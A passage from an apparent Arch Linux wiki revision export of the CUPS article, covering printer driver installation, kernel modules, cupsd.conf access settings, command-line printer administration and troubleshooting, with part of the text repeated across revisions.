To check the printer's settings go to ''Printers'', then ''Modify Printer''. Copy down the information displayed, click 'Modify Printer' to proceed to the next page(s), and so on.<br />
<br />
====All jobs are "The printer is not responding"====<br />
On networked printers, you should check that the name that CUPS uses as its connection URI resolves to the printer's IP via DNS, e.g.<br />
If your printer's connection looks like this:<br />
lpd://BRN_020554/BINARY_P1<br />
<br />
then the hostname 'BRN_020554' needs to resolve to the printer's IP from the server running CUPS<br />
<br />
====The PPD version is not compatible with gutenprint====<br />
Run:<br />
# /usr/sbin/cups-genppdupdate<br />
<br />
And restart CUPS (as pointed out in gutenprint's post-install message)<br />
<br />
===Other===<br />
<br />
=====CUPS permission errors=====<br />
*Some users fixed 'NT_STATUS_ACCESS_DENIED' (Windows clients) errors by using a slightly different syntax:<br />
smb://workgroup/username:password@hostname/printer_name<br />
<br />
*Sometimes, the block device has wrong permissions:<br />
# ls /dev/usb/<br />
lp0<br />
# chgrp lp /dev/usb/lp0<br />
<br />
====HPLIP printer sends "/usr/lib/cups/backend/hp failed" error====<br />
Make sure dbus is installed and running. If the error persists, try starting avahi-daemon.<br />
<br />
Try adding the printer as a Network Printer using the http:// protocol. Generate the printer URI with {{ic|hp-makeuri}}.<br />
<br />
{{Note|There might need to set permissions issues right. Follow indications here: [[CUPS#Device node permissions]].}}<br />
<br />
====HPLIP printer claims job is complete but printer does nothing====<br />
This happens on HP printers when you select the (old) hpijs driver (e.g. the Deskjet D1600 series). Instead, use the hpcups driver when adding the printer.<br />
<br />
Some HP printers (e.g HP LaserJet) require their firmware to be downloaded from the computer every time the printer is switched on. If there is an issue with udev (or equivalent) and the firmware download rule is never fired, you may experience this issue.<br />
As a workaround, you can manually download the firmware to the printer. Ensure the printer is plugged in and switched on, then enter<br />
hp-firmware -n<br />
<br />
====hp-toolbox sends an error, "Unable to communicate with device"====<br />
If running hp-toolbox as a regular user results in:<br />
# hp-toolbox<br />
# error: Unable to communicate with device (code=12): hp:/usb/<printer id><br />
or, "{{ic|Unable to communicate with device"}}", then it may be needed to [[Groups#Group management|add the user to the lp and sys groups]].<br />
<br />
This can also be caused by printers such as the P1102 that provide a virtual cd-rom drive for MS-Windows drivers. The lp dev appears and then disappears. In that case try the '''usb-modeswitch''' and '''usb-modeswitch-data''' packages, that lets one switch off the "Smart Drive" (udev rules included in said packages).<br />
<br />
This can also occur with network attached printers if the [[Avahi|avahi-daemon]] is not running.<br />
<br />
====CUPS returns '"foomatic-rip" not available/stopped with status 3' with a HP printer====<br />
If receiving any of the following error messages in {{ic|/var/log/cups/error_log}} while using a HP printer, with jobs appearing to be processed while they all end up not being completed with their status set to 'stopped':<br />
Filter "foomatic-rip" for printer "<printer_name>" not available: No such file or director<br />
or:<br />
PID 5771 (/usr/lib/cups/filter/foomatic-rip) stopped with status 3!<br />
make sure {{pkg|hplip}} has been [[pacman|installed]], in addition to [[#Packages|the packages mentioned above]]. See [https://bbs.archlinux.org/viewtopic.php?id=65615 this forum post] for more information.<br />
<br />
====Printing fails with unauthorised error====<br />
If the user has been added to the lp group, and allowed to print (set in {{ic|cupsd.conf}}), then the problem lies in {{ic|/etc/cups/printers.conf}}. This line could be the culprit:<br />
AuthInfoRequired negotiate<br />
<br />
Comment it out and restart CUPS.<br />
<br />
====Print button greyed-out in GNOME print dialogs====<br />
:''<small>Source: [https://bbs.archlinux.org/viewtopic.php?id=70418 I can't print from gnome applications. - Arch Forums]</small>''<br />
<br />
Be sure the package: '''libgnomeprint''' is installed<br />
<br />
Edit {{ic|/etc/cups/cupsd.conf}} and add<br />
# HostNameLookups Double<br />
<br />
Restart CUPS:<br />
# systemctl restart cups<br />
<br />
====Unknown supported format: application/postscript====<br />
Comment the lines:<br />
application/octet-stream application/vnd.cups-raw 0 -<br />
from {{ic|/etc/cups/mime.convs}}, and:<br />
application/octet-stream<br />
in {{ic|/etc/cups/mime.types}}.<br />
<br />
====Finding URIs for Windows Print Servers====<br />
<br />
Sometimes Windows is a little less than forthcoming about exact device URIs (device locations). If having trouble specifying the correct device location in CUPS, run the following command to list all shares available to a certain windows username:<br />
$ smbtree -U ''windowsusername''<br />
This will list every share available to a certain Windows username on the local area network subnet, as long as Samba is set up and running properly. It should return something like this:<br />
{{bc| WORKGROUP<br />
\\REGULATOR-PC <br />
\\REGULATOR-PC\Z <br />
\\REGULATOR-PC\Public <br />
\\REGULATOR-PC\print$ Printer Drivers<br />
\\REGULATOR-PC\G <br />
\\REGULATOR-PC\EPSON Stylus CX8400 Series EPSON Stylus CX8400 Series}}<br />
What is needed here is first part of the last line, the resource matching the printer description. So to print to the EPSON Stylus printer, one would enter:<br />
smb://username.password@REGULATOR-PC/EPSON Stylus CX8400 Series<br />
as the URI into CUPS. Notice that whitespaces are allowed in URIs, whereas backslashes get replaced with forward slashes.<br />
If it won't work try '%20' instead of spaces.<br />
<br />
====Print-Job client-error-document-format-not-supported====<br />
Try installing the foomatic packages and use a foomatic driver.<br />
<br />
====/usr/lib/cups/backend/hp failed====<br />
Change<br />
SystemGroup sys root<br />
to<br />
SystemGroup lp root<br />
in {{ic|/etc/cups/cupsd.conf}}<br />
<br />
<br />
Following steps 1-3 in the Alternative CUPS interfaces below may be a better solution, since newer versions of cups will not allow the same group for both normal and admin operation.<br />
<br />
==== Unable to get list of printer drivers ====<br />
* Check your ServerName in /etc/cups/client.conf is written without http://<br />
ServerName localhost:631<br />
* Try to remove Foomatic drivers.<br />
<br />
====lp: Error - Scheduler Not Responding====<br />
If you get this error when printing a document using:<br />
<br />
$ lp document-to-print<br />
<br />
Try setting the CUPS_SERVER environment variable:<br />
<br />
$ export CUPS_SERVER=localhost<br />
<br />
If this solves your problem, make the solution permanent by adding the export line above to ~/.bash_profile.<br />
<br />
====CUPS prints only an empty and an error-message page on HP LaserJet====<br />
<br />
There is a bug that causes CUPS to fail when printing images on HP LaserJet (in my case 3380). The bug has been reported and fixed by [https://bugs.launchpad.net/ubuntu/+source/cups-filters/+bug/998087 Ubuntu].<br />
The first page is empty, the second page contains the following error message:<br />
ERROR:<br />
invalidaccess<br />
OFFENDING COMMAND:<br />
filter<br />
STACK:<br />
/SubFileDecode<br />
endstream<br />
...<br />
<br />
In order to fix the issue, use the following command (as superuser):<br />
lpadmin -p <printer> -o pdftops-renderer-default=pdftops<br />
<br />
===="Using invalid Host" error message====<br />
<br />
Try to add "ServerAlias *" into cupsd.conf<br />
<br />
====Printer doesn't print with an "Filter failed" message on CUPS web interface (HP printer)====<br />
<br />
Change the permissions of the printer USB port:<br />
<br />
Get the bus and device number from lsusb, then set the permission using:<br />
<br />
{{ic|chmod 0666 /dev/bus/usb/<bus number>/<device number>}}<br />
<br />
To make the persistent permission change that will be triggered automatically each time the computer is rebooted, add the following line.<br />
<br />
{{hc|/etc/udev/rules.d/10-local.rules|<nowiki>SUBSYSTEM=="usb", ATTRS{idVendor}=="Printer_idVendor", ATTRS{idProduct}=="Printer_idProduct", GROUP="lp", MODE:="666"</nowiki>}}<br />
<br />
Obtain the right information by using {{ic|lsusb}} command, and don't forget to substitute {{ic|Printer_idVendor}} & {{ic|Printer_idProduct}} with the relevant ones.<br />
<br />
Each system may vary, so consult [[udev#List_attributes_of_a_device]] wiki page.<br />
<br />
====HPLIP 3.13: Plugin is installed, but HP Device Manager complains it is not====<br />
<br />
The issue might have to do with the file permission change that had been made to {{ic|/var/lib/hp/hplip.state}}. To correct the issue, a simple {{ic|chmod 644 /var/lib/hp/hplip.state}} and {{ic|chmod 755 /var/lib/hp}} should be sufficient. For further information, please read this [https://bugs.launchpad.net/hplip/+bug/1131596 link].<br />
<br />
====Printer is not recognized by CUPS====<br />
<br />
If your printer is not listed in the "Add Printers" page of the CUPS web interface, nor by lpinfo -v, try the following (suggested in [https://bbs.archlinux.org/viewtopic.php?pid=1037279#p1037279 this thread]):<br />
<br />
# Remove {{ic|usblp}} from blacklist<br />
# Load {{ic|usblp}} module<br />
modprobe usblp<br />
# Stop cups (sudo systemctl stop cups)<br />
# Add the following udev rule in the following new rule /etc/udev/rules.d/10-cups_device_link.rules<br />
KERNEL=="lp[0-9]", SYMLINK+="%k", GROUP="lp"<br />
# Reload udev rules<br />
sudo udevadm control --reload-rules<br />
# Unplug and re-plug the printer <br />
# Wait a few seconds and then start cups again (sudo systemctl start cups)<br />
<br />
==See also==<br />
* [http://localhost:631/documentation.html Official CUPS documentation], ''locally installed''<br />
* [http://www.cups.org/ Official CUPS Website]<br />
* [http://www.linuxprinting.org/ Linux Printing], ''[http://www.linuxfoundation.org The Linux Foundation]''<br />
* [http://www.gentoo.org/doc/en/printing-howto.xml Gentoo's Printing Guide], ''[http://www.gentoo.org/doc/en Gentoo Documentation Resources]''<br />
* [https://bbs.archlinux.org/ Arch Linux User Forums]<br />
* [http://wiki.gotux.net/tutorials/software/hp-printer Install HP Printers Easy Way]</div>Wakehttps://wiki.archlinux.org/index.php?title=CUPS&diff=251532CUPS2013-03-21T13:07:37Z<p>Wake: /* CUPS administration */</p>
<hr />
<div>[[Category:Printers]]<br />
[[cs:CUPS]]<br />
[[es:CUPS]]<br />
[[fr:CUPS]]<br />
[[it:CUPS]]<br />
[[pl:CUPS]]<br />
[[ru:CUPS]]<br />
[[th:CUPS]]<br />
[[tr:CUPS]]<br />
[[zh-CN:CUPS]]<br />
[[zh-TW:CUPS]]<br />
{{Article summary start|Summary}}<br />
{{Article summary text|Installing and configuring CUPS}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|CUPS printer sharing}}<br />
{{Article summary wiki|CUPS printer-specific problems}}<br />
{{Article summary wiki|Samba}}<br />
{{Article summary end}}<br />
<br />
From [http://www.cups.org/index.php CUPS' site]:<br />
:"''[[Wikipedia:CUPS|CUPS]] is the standards-based, open source printing system developed by Apple Inc. for OS® X and other UNIX®-like operating systems''".<br />
<br />
Although there are other printing packages such as LPRNG, the Common Unix Printing System is the most popular choice because of its relative ease of use.<br />
<br />
==CUPS Linux Printing workflow==<br />
As of {{Pkg|cups}} version 1.5.3-3, Arch Linux makes use of the new full pdf-based printing workflow. For<br />
further reading check [http://www.linuxfoundation.org/collaborate/workgroups/openprinting/pdfasstandardprintjobformat PDF standard printing job format] and an old [https://wiki.linuxfoundation.org/en/OpenPrinting/Database/CUPS-Filter-Chart CUPS filtering chart] for history and fun.<br />
A good starting point for general Linux printing questions is [http://www.linuxfoundation.org/collaborate/workgroups/openprinting here].<br />
<br />
There are two ways to setup a printer.<br />
* If there's a CUPS server running in your network and sharing a printer you only need to install the client package.<br />
* If the printer is connected directly to your system or you have access to an IPP network printer then setup a local CUPS server.<br />
<br />
==Installing the client package==<br />
The package {{Pkg|libcups}} is the only required package. [[pacman|Install]] it from the [[Official repositories]].<br />
<br />
Then add your CUPS server's IP address or hostname into {{ic|/etc/cups/client.conf}}. That is all you need. Every application should quickly find the printer(s) shared by that CUPS server.<br />
<br />
===Optional advanced network setup===<br />
It is also possible to run a entire cupsd+cups-browsed instance on your client with Avahi browsing enabled to discover unknown shared printers in your network. This can be useful in large setups where the server is unknown.<br />
{{Note|This behavior did not change with cups 1.6.x - the difference is that until 1.5.x cupsd was able to do printer browsing alone and now it can only browse its own shared printers.<br />
To get the local cupsd recognise other shared printers offered by a remote cupsd server you need a running local cups-browserd (supported since cups-filters 1.0.26) instance using Avahi to discover unknown printers.}}<br />
<br />
==Installing the server packages==<br />
The following packages and some printer drivers are needed. [[pacman|Install]] them from the [[Official repositories]].<br />
<br />
* {{Pkg|cups}} - the actual CUPS daemon<br />
* {{Pkg|cups-filters}} - essential filters<br />
* {{Pkg|ghostscript}} - (optional) PostScript interpreter<br />
* {{Pkg|gsfonts}} - GhostScript standard Type1 fonts<br />
<br />
# pacman -S cups cups-filters ghostscript gsfonts<br />
<br />
If you want to enable printer browsing through your network, also install {{Pkg|avahi}}. Make sure '''avahi-daemon''' is started before '''cupsd'''.<br />
<br />
If the system is connected to a networked printer using the [[Samba]] protocol or if the system is to be a print server for Windows clients, also install {{Pkg|samba}}.<br />
<br />
===Printer driver===<br />
Here are some of the driver packages. Choosing the right driver depends on the printer:<br />
<br />
* '''{{Pkg|gutenprint}}''' - A collection of high quality drivers for Canon, Epson, Lexmark, Sony, Olympus, and PCL printers for use with GhostScript, CUPS, Foomatic, and the [[GIMP]]<br />
* '''{{Pkg|foomatic-db}}, {{Pkg|foomatic-db-engine}}, {{Pkg|foomatic-db-nonfree}}, and {{Pkg|foomatic-filters}}''' - Foomatic is a database-driven system for integrating free software printer drivers with common spoolers under Unix. Installing foomatic-filters should solve problems if the cups error_log is reporting "stopped with status 22!".<br />
* '''{{Pkg|hplip}}''' - HP drivers for DeskJet, OfficeJet, Photosmart, Business Inkjet and some LaserJet printer models, as well as a number of Brother printers.<br />
* '''{{Pkg|splix}}''' - Samsung drivers for SPL (Samsung Printer Language) printers.<br />
<br />
* '''{{AUR|foo2zjs}}''' - Drivers for ZjStream protocol printers such as the HP Laserjet 1018. More info [http://foo2zjs.rkkda.com here]. Package is available in the [[AUR]].<br />
* '''{{AUR|hpoj}}''' - If you are using an HP Officejet, you should also install this package and follow the instructions to avoid problems as in [https://answers.launchpad.net/hplip/+question/133425 this thread]. Package is available in the [[AUR]].<br />
* '''{{AUR|samsung-unified-driver}}''' - Unified Linux Driver for Samsung printers and scanners. Required for new printers such as the ML-2160. Package is available in the [[AUR]].<br />
* '''{{AUR|ufr2}}''' or '''{{AUR|cndrvcups-lb}}''' - Canon UFR2 driver with support for LBP, iR and MF series printers. Package is available in the [[AUR]].<br />
<br />
* '''{{Pkg|cups-pdf}}''' - A package that allows one to setup a virtual PDF Printer that generates a PDF out of jobs sent to it<br />
<br />
If you are not sure of what driver package to install or if the current driver is not working, it may be easiest to just install all of the drivers. Some of the package names are misleading because printers of other makes may rely on them. For example, the Brother HL-2140 needs the hplip driver installed.<br />
<br />
====Download printer PPD====<br />
Depending on the printer, this step is optional and may not be needed, as the standard CUPS installation already comes with quite a few PPD (Postscript Printer Description) files. Moreover, the ''foomatic-filters'', ''gimp-print'' and ''hplip'' packages already include quite a few PPD files which will automatically be detected by CUPS.<br />
<br />
Here is an explanation of what a PPD file is from the Linux Printing website:<br />
:"''For every PostScript printer the manufacturers provide a PPD file which contains all printer-specific information about the particular printer model: Basic printer capabilities as whether the printer is a color printer, fonts, PostScript level, etc., and especially the user-adjustable options, as paper size, resolution, etc.''"<br />
<br />
If the PPD for the printer is ''not'' already in CUPS, then:<br />
*check [[AUR]] to see if there are packages for the printer/manufacturer<br />
*visit the [http://www.openprinting.org/printers OpenPrinting database] and select the manufacturer and model of the printer<br />
*visit the manufacturer's site and search for GNU/Linux drivers<br />
<br />
{{Note|PPD files go in {{ic|/usr/share/cups/model/}}}}<br />
<br />
====Another source for printer drivers====<br />
[http://www.turboprint.de/english.html Turboprint] is a proprietary driver for many printers not yet supported by GNU/Linux (Canon i*, for example). Unlike CUPS, however, high quality prints are either marked with a watermark or are a pay-only service.<br />
<br />
==Hardware support and configuration==<br />
<br />
USB printers can get accessed with two methods: The usblp kernel module and libusb. The former is the classic way. It is simple: data is sent to the printer by writing it to a device file as a simple serial data stream. Reading the same device file allows bi-di access, at least for things like reading out ink levels, status, or printer capability information (PJL). It works very well for simple printers, but for multi-function devices (printer/scanner) it is not suitable and manufacturers like HP supply their own backends. Source: [http://lists.linuxfoundation.org/pipermail/printing-architecture/2012/002412.html here].<br />
<br />
===Kernel modules===<br />
Before using the CUPS web interface, the appropriate kernel modules need to be installed. The following steps are from the Gentoo Printing Guide.<br />
<br />
This section may not be necessary, however, depending on which kernel is being used. The kernel module may load automatically after plugging in the printer. Use the {{ic|tail}} command (described below) to see if the printer has already been detected. The {{ic|lsmod}} utility can also be used to see what modules have been loaded.<br />
<br />
====USB printers====<br />
{{Warning|As of {{pkg|cups}} version 1.6.0, you no longer need to [[Kernel modules#Blacklisting|blacklist]] the {{ic|usblp}} kernel module.}}<br />
If you find out this is the only way to fix a remaining issue please report this upstream to the CUPS bug tracker and maybe also get in contact with Till Kamppeter (Debian CUPS maintainer). See [http://cups.org/str.php?L4128 upstream bug] for more.<br />
<br />
Some USB printer users may want to try if blacklisting the {{ic|usblp}} module would help:<br />
<br />
{{hc|/etc/modprobe.d/blacklist.conf|blacklist usblp}}<br />
<br />
Custom kernel users may need to manually load the {{ic|usbcore}} module before proceeding:<br />
# modprobe usbcore<br />
<br />
Once the modules are installed, plug in the printer and check if the kernel detected it by running the following:<br />
# tail /var/log/messages.log<br />
or<br />
# dmesg<br />
<br />
If you're using {{ic|usblp}}, the output should indicate that the printer has been detected like so:<br />
Feb 19 20:17:11 kernel: printer.c: usblp0: USB Bidirectional<br />
printer dev 2 if 0 alt 0 proto 2 vid 0x04E8 pid 0x300E<br />
Feb 19 20:17:11 kernel: usb.c: usblp driver claimed interface cfef3920<br />
Feb 19 20:17:11 kernel: printer.c: v0.13: USB Printer Device Class driver<br />
<br />
If you blacklisted {{ic|usblp}}, you will see something like:<br />
usb 3-2: new full speed USB device using uhci_hcd and address 3<br />
usb 3-2: configuration #1 chosen from 1 choice<br />
<br />
====Parallel port printers====<br />
To use a parallel port printer the configuration is pretty much the same, except for the modules:<br />
# modprobe lp<br />
# modprobe parport<br />
# modprobe parport_pc<br />
<br />
Once again, check the setup by running:<br />
# tail /var/log/messages.log<br />
It should display something like this:<br />
lp0: using parport0 (polling).<br />
<br />
If you are using a USB to parallel port adapter, CUPS will not be able to detect the printer. As a workaround, add the printer using a different connection type and then change DeviceID in {{ic|/etc/cups/printers.conf}}:<br />
DeviceID = parallel:/dev/usb/lp0<br />
<br />
====Auto-loading====<br />
It is convenient to have the system automatically load the kernel module every time it starts up. To do so, use a text editor to open up {{ic|/etc/modules-load.d/printing.conf}} and add the appropriate modules one per line. Here is an example:<br />
lp<br />
parport<br />
parport_pc<br />
<br />
=== HP Printer ===<br />
HP printers can also be installed via HP's linux setup tool. If you want to run the setup tool, ensure you have {{ic|python2-qt}} and {{ic|pygobject}}.<br />
<br />
To run with qt frontend :<br />
{{bc|<nowiki><br />
# hp-setup -u<br />
</nowiki>}}<br />
<br />
To run with command line : <br />
{{bc|<nowiki><br />
# hp-setup -i<br />
</nowiki>}}<br />
PPD files are in {{ic|/usr/share/ppd/HP/}}.<br />
<br />
For printers that require the proprietary HP plugin (like the P1102w), install the {{AUR|hplip-plugin}} package from [[AUR]].<br />
<br />
==Configuring==<br />
Now that CUPS is installed, there are a variety of options on how to set up printing solutions. As always, the tried and true command line method is at your disposal. CUPS also embeds a full-featured web interface. Likewise, various desktop environments such as GNOME and KDE have useful programs that can help manage printers. Depending on your needs, you may choose one method or the other.<br />
<br />
If you are planning on connecting to a network printer, rather than one that is directly connected to the computer, you might want to read the [[CUPS printer sharing]] page first. Printer sharing between GNU/Linux systems is quite easy and involves very little configuration, whereas sharing between a Windows and GNU/Linux host requires a little bit more effort.<br />
<br />
===CUPS daemon===<br />
With the kernel modules installed, you can now start the '''cups''' and optionally, the '''cups-browsed''' [[daemons]].<br />
<br />
=== Web interface and tool-kit ===<br />
<br />
Once the daemon is running, open a browser and go to: http://localhost:631 (''The '''localhost''' string may need to be replaced with the hostname found in'' {{ic|/etc/hostname}}).<br />
<br />
From here, follow the various wizards to add the printer. A usual procedure is to start by clicking on ''Adding Printers and Classes'' and then ''Add Printer''. When prompted for a username and password, log in as root. The name assigned to the printer does not matter, the same applies for 'location' and 'description'. Next, a list of devices to select from will be presented. The actual name of the printer shows up next to the label (e.g., next to ''USB Printer #1'' for USB printers). Finally, choose the appropriate drivers and the configuration is complete.<br />
<br />
Now test the configuration by pressing the ''Maintenance'' drop-down menu then ''Print Test Page''. If it does not print and there is certainty regarding the correctness of applied settings, then the problem is most likely due to missing a proper printer driver.<br />
<br />
{{Tip|See: [[#Alternative CUPS interfaces]] for other other front-ends.}}<br />
{{Note|When setting up a USB printer, you should see your printer listed on ''Add Printer'' page. If you can only see a "SCSI printer" option, it probably means that CUPS has failed to recognize <br />
your printer.}}<br />
<br />
{{Note|To enable wireless scanning on certain HP multi-function devices using the {{pkg|hplip}} package, you may need to add the printer as a Network Printer using the http:// protocol. To determine the proper URI to use, run the {{ic|hp-makeuri}} command.}}<br />
<br />
==== CUPS administration ====<br />
<br />
A username and password will be required when administering the printer in the web interface, such as: adding or removing printers, stopping print tasks, etc. The default username is the one assigned in the ''sys'' group, or root. Other admin groups (e.g. lpadmin or printadmin) may be added to the {{ic|SystemGroup}} line in {{ic|/etc/cups/cupsd.conf}} (you might have to add this line). See [http://www.cups.org/articles.php?L237+T+Qprintadmin these instructions at cups.org]. You might also want to read [https://bbs.archlinux.org/viewtopic.php?id=35567 this post]. Create the group[s] ({{ic|man groupadd}}) and add the group[s] to users ({{ic|man usermod}}). cupsd must be restarted and the user must re-login for these changes to take affect.<br />
<br />
If the root account has been locked (i.e. when using sudo), it is not possible to log in the CUPS administration interface with the default username (root) and password. Follow the instructions above to add other users as cups administrators.<br />
<br />
====Remote access to web interface====<br />
By default, the CUPS web interface can only be accessed by the ''localhost''; i.e. the computer that it is installed on. To remotely access the interface, make the following changes to the {{ic|/etc/cups/cupsd.conf}} file. Replace the line:<br />
Listen localhost:631<br />
with<br />
Port 631<br />
so that CUPS listens to incoming requests.<br />
<br />
Three levels of access can be granted:<br />
<Location /> #access to the server<br />
<Location /admin> #access to the admin pages<br />
<Location /admin/conf> #access to configuration files<br />
<br />
To give remote hosts access to one of these levels, add an {{ic|Allow}} statement to that level's section. An {{ic|Allow}} statement can take one or more of the forms listed below:<br />
Allow from all<br />
Allow from host.domain.com<br />
Allow from *.domain.com<br />
Allow from ip-address<br />
Allow from ip-address/netmask<br />
<br />
Deny statements can also be used. For example, if wanting to give all hosts on the 192.168.1.0/255.255.255.0 subnet full access, file {{ic|/etc/cups/cupsd.conf}} would include this:<br />
# Restrict access to the server...<br />
# By default only localhost connections are possible<br />
<Location /><br />
Order allow,deny<br />
Allow from localhost<br />
'''Allow from 192.168.1.0/255.255.255.0'''<br />
</Location><br />
<br />
# Restrict access to the admin pages...<br />
<Location /admin><br />
# Encryption disabled by default<br />
#Encryption Required<br />
Order allow,deny<br />
Allow from localhost<br />
'''Allow from 192.168.1.0/255.255.255.0'''<br />
</Location><br />
<br />
# Restrict access to configuration files...<br />
<Location /admin/conf><br />
AuthType Basic<br />
Require user @SYSTEM<br />
Order allow,deny<br />
Allow From localhost<br />
'''Allow From 192.168.1.0/255.255.255.0'''<br />
</Location><br />
<br />
You might also need to add:<br />
<br />
DefaultEncryption Never<br />
<br />
This should avoid the error: 426 - Upgrade Required when using the CUPS web interface from a remote machine.<br />
<br />
===Command-line configuration===<br />
<br />
CUPS can be fully controlled from command-line with nice tools, ''i.e.'' the lp* and the cups* command families.<br />
<br />
On Arch Linux, most commands support auto-completion with common shells.<br />
Also note that command-line switches cannot be grouped.<br />
<br />
;List the devices<br />
# lpinfo -v<br />
<br />
;List the drivers<br />
# lpinfo -m<br />
<br />
;Add a new printer<br />
# lpadmin -p <printer> -E -v <device> -P <ppd><br />
<br />
The <printer> is up to you. The device can be retrieved from the 'lpinfo -i' command.<br />
Example:<br />
# lpadmin -p HP_DESKJET_940C -E -v "usb://HP/DESKJET%20940C?serial=CN16E6C364BH" -P /usr/share/ppd/HP/hp-deskjet_940c.ppd.gz<br />
<br />
In the following, the <printer> references the name you have used here to set up the printer.<br />
<br />
;Set the default printer<br />
$ lpoptions -d <printer><br />
<br />
;Check the status<br />
$ lpstat -s<br />
$ lpstat -p <printer><br />
<br />
;Deactivate a printer<br />
# cupsdisable <printer><br />
<br />
;Activate a printer<br />
# cupsenable <printer><br />
<br />
;Remove a printer<br />
First set it to reject all incoming entries:<br />
# cupsreject <printer><br />
Then disable it.<br />
# cupsdisable <printer><br />
Finally remove it.<br />
# lpadmin -x <printer><br />
<br />
;Print a file<br />
$ lpr <file><br />
$ lpr -# 17 <file> # print the file 17 times<br />
$ echo "Hello, world!" | lpr -p # print the result of a command. The -p switch adds a header.<br />
<br />
;Check the printing queue<br />
$ lpq<br />
$ lpq -a # on all printers<br />
<br />
;Clear the printing queue<br />
# lprm # remove last entry only<br />
# lprm - # remove all entries<br />
<br />
===GNOME CUPS interface===<br />
If using [[GNOME]], a possibility is to manage and configure the printer by [[pacman|installing]] {{Pkg|system-config-printer}}.<br />
<br />
For system-config-printer to work as it should, running as root may be required, or alternatively set up a "normal" user to administer CUPS (if so '''follow steps 1-3''')<br />
<br />
* 1. Create group, and add a user to it<br />
# groupadd lpadmin<br />
# usermod -aG lpadmin <username><br />
<br />
* 2. Add "lpadmin" (without the quotes) to this line in {{ic|/etc/cups/cupsd.conf}}<br />
SystemGroup sys root <insert here><br />
<br />
* 3. Restart cups, log out and in again (or restart computer)<br />
{{bc|# systemctl restart cups}}<br />
<br />
[[KDE]] users can modify their printers from the Control Center. Both should refer to those desktop environments' documentation for more information on how to use the interfaces.<br />
<br />
There is also {{AUR|gtklp}} in the [[AUR]].<br />
<br />
==PDF virtual printer==<br />
CUPS-PDF is a nice package that allows one to setup a virtual printer that will generate a PDF from anything sent to it. This package is not necessary, but it can be quite useful. It can be installed using the following command:<br />
# pacman -S cups-pdf<br />
<br />
After installing the package, set it up as if it were for any other printer by using the web interface. Access the cups print manager: http://localhost:631 and select:<br />
Administration -> Add Printer<br />
Select CUPS-PDF (Virtual PDF), choose for the make and driver:<br />
Make: Generic<br />
Driver: Generic CUPS-PDF Printer<br />
<br />
Find generated PDF documents in a sub-directory located at {{ic|/var/spool/cups-pdf}}. Normally, the subdirectory is named after the user who performed the job. A little tweak helps you to find your printed PDF documents more easily. Edit {{ic|/etc/cups/cups-pdf.conf}} by changing the line<br />
#Out /var/spool/cups-pdf/${USER}<br />
<br />
to<br />
<br />
Out ${HOME}<br />
<br />
=== Print to PostScript ===<br />
The CUPS-PDF (Virtual PDF Printer) actually creates a PostScript file and then creates the PDF using the ps2pdf utility. To print to PostScript, just print as usual, in the print dialog choose "CUPS-PDF" as the printer, then select the checkbox for "print to file", hit print, enter the filename.ps and click save. This is handy for faxes, etc...<br />
<br />
==Troubleshooting==<br />
The best way to get printing working is to set 'LogLevel' in {{ic|/etc/cups/cupsd.conf}} to:<br />
LogLevel debug<br />
<br />
And then viewing the output from {{ic|/var/log/cups/error_log}} like this:<br />
# tail -n 100 -f /var/log/cups/error_log<br />
<br />
The characters at the left of the output stand for:<br />
*D=Debug<br />
*E=Error<br />
*I=Information<br />
*And so on<br />
<br />
These files may also prove useful:<br />
*{{ic|/var/log/cups/page_log}} - Echoes a new entry each time a print is successful<br />
*{{ic|/var/log/cups/access_log}} - Lists all cupsd http1.1 server activity<br />
<br />
Of course, it is important to know how CUPS works if wanting to solve related issues:<br />
# An application sends a .ps file (PostScript, a script language that details how the page will look) to CUPS when 'print' has been selected (this is the case with most programs).<br />
# CUPS then looks at the printer's PPD file (printer description file) and figures out what filters it needs to use to convert the .ps file to a language that the printer understands (like PJL, PCL), usually GhostScript.<br />
# GhostScript takes the input and figures out which filters it should use, then applies them and converts the .ps file to a format understood by the printer.<br />
# Then it is sent to the back-end. For example, if the printer is connected to a USB port, it uses the USB back-end.<br />
<br />
Print a document and watch {{ic|error_log}} to get a more detailed and correct image of the printing process.<br />
<br />
===Problems resulting from upgrades===<br />
''Issues that appeared after CUPS and related program packages underwent a version increment''<br />
<br />
====CUPS stops working====<br />
The chances are that a new configuration file is needed for the new version to work properly. Messages such as "404 - page not found" may result from trying to manage CUPS via localhost:631, for example.<br />
<br />
To use the new configuration, copy {{ic|/etc/cups/cupsd.conf.default}} to {{ic|/etc/cups/cupsd.conf}} (backup the old configuration if needed) and restart CUPS to employ the new settings.<br />
<br />
====All jobs are "stopped"====<br />
If all jobs sent to the printer become "stopped", delete the printer and add it again.<br />
Using the [http://localhost:631 CUPS web interface], go to Printers > Delete Printer.<br />
<br />
To check the printer's settings go to ''Printers'', then ''Modify Printer''. Copy down the information displayed, click 'Modify Printer' to proceed to the next page(s), and so on.<br />
<br />
====All jobs are "The printer is not responding"====<br />
On networked printers, you should check that the name that CUPS uses as its connection URI resolves to the printer's IP via DNS, e.g.<br />
If your printer's connection looks like this:<br />
lpd://BRN_020554/BINARY_P1<br />
<br />
then the hostname 'BRN_020554' needs to resolve to the printer's IP from the server running CUPS<br />
<br />
====The PPD version is not compatible with gutenprint====<br />
Run:<br />
# /usr/sbin/cups-genppdupdate<br />
<br />
And restart CUPS (as pointed out in gutenprint's post-install message)<br />
<br />
===Other===<br />
<br />
=====CUPS permission errors=====<br />
*Some users fixed 'NT_STATUS_ACCESS_DENIED' (Windows clients) errors by using a slightly different syntax:<br />
smb://workgroup/username:password@hostname/printer_name<br />
<br />
*Sometimes, the block device has wrong permissions:<br />
# ls /dev/usb/<br />
lp0<br />
# chgrp lp /dev/usb/lp0<br />
<br />
====HPLIP printer sends "/usr/lib/cups/backend/hp failed" error====<br />
Make sure dbus is installed and running. If the error persists, try starting avahi-daemon.<br />
<br />
Try adding the printer as a Network Printer using the http:// protocol. Generate the printer URI with {{ic|hp-makeuri}}.<br />
<br />
{{Note|There might need to set permissions issues right. Follow indications here: [[CUPS#Device node permissions]].}}<br />
<br />
====HPLIP printer claims job is complete but printer does nothing====<br />
This happens on HP printers when you select the (old) hpijs driver (e.g. the Deskjet D1600 series). Instead, use the hpcups driver when adding the printer.<br />
<br />
Some HP printers (e.g HP LaserJet) require their firmware to be downloaded from the computer every time the printer is switched on. If there is an issue with udev (or equivalent) and the firmware download rule is never fired, you may experience this issue.<br />
As a workaround, you can manually download the firmware to the printer. Ensure the printer is plugged in and switched on, then enter<br />
hp-firmware -n<br />
<br />
====hp-toolbox sends an error, "Unable to communicate with device"====<br />
If running hp-toolbox as a regular user results in:<br />
# hp-toolbox<br />
